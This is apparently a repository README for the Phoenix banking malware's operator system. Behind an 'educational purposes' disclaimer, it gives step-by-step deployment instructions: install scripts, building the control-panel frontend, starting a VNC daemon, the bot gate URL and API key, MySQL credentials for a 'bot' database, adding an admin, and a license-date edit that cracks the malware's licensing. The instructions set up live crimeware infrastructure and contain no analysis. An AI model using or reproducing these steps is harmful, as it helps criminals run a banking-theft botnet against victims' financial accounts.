Notice: I am not the author of the Phoenix malware, and I am not responsible for any actions taken using the information provided in this repository. This repository is shared strictly for educational purposes, aimed at blue teamers, malware reverse engineers, and threat hunters. The tools and instructions provided here are intended to help cybersecurity professionals understand and mitigate the threat posed by Phoenix banking malware.
Any misuse of the information contained in this repository, including but not limited to illegal activities, is strictly prohibited and entirely the responsibility of the individual(s) involved. By using the materials provided here, you agree to use them responsibly and solely for lawful purposes.
This repository is provided "as is" without any warranties, express or implied. The author is not liable for any damage or loss caused by the use or misuse of the information and tools provided.
Phoneix banking bot Source code
This repository contains scripts and instructions for deploying the Phoenix Banking Malware analysis and management system.
- Overview
- Prerequisites
- Installation
- Frontend Setup
- Daemon Server Setup
- Settings Panel
- MySQL Setup
- Starting Services
Phoenix is a sophisticated banking malware designed to steal sensitive financial information. This repository provides tools and instructions to deploy a system for analyzing and managing Phoenix malware.
- Ubuntu/Debian-based Linux distribution
- Basic knowledge of terminal commands and system administration
-
Update the package list and install
dos2unix
:sudo apt update && sudo apt install dos2unix -y
-
Convert and execute the
install.sh
script:dos2unix install.sh chmod 777 install.sh bash install.sh
-
Install Node.js:
bash node.sh export NVM_DIR="$HOME/.nvm" [ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" [ -s "$NVM_DIR/bash_completion" ] && \. "$NVM_DIR/bash_completion" nvm install v19.9.0 nvm use v19.9.0
-
Change License:
- Open
/var/data/www/src/settings.js
- Change:
to:
LicenseEnd: new Date('2030-09-26'),
LicenseEnd: new Date('2500-09-26'),
- Open
-
Build Frontend:
cd /var/data/www npm install && npm run build npm start # Verify the frontend starts correctly
-
Start Daemon Panel:
cd /var/data/www screen npm start
-
Start VNC Daemon:
cd /root screen ./vnc
- Access the panel at
http://..urlpanel..:5000/login?secret=..loginds..
- Access the traffic panel at
http://..trafficpanel../index.php
- Gate URL:
http://..urlpanel..:4000
- VNC URL:
http://..urlpanel..:9000
- API key for the Gate:
..apicryptkey..
-
MySQL Credentials:
- Server IP:
yourip
- User:
phoniex
- Password:
..passsql..
- Database:
bot
- Server IP:
-
Restart MySQL and other services:
sudo service mysql restart sudo service nginx restart sudo service php8.1-fpm restart
-
Add Admin:
cd /root && ./addadmin.sh
-
Start VNC Daemon:
cd /root screen ./vnc
-
Start Frontend:
cd /var/data/www screen npm start
Ensure all services are running as expected by checking the respective URLs and panels.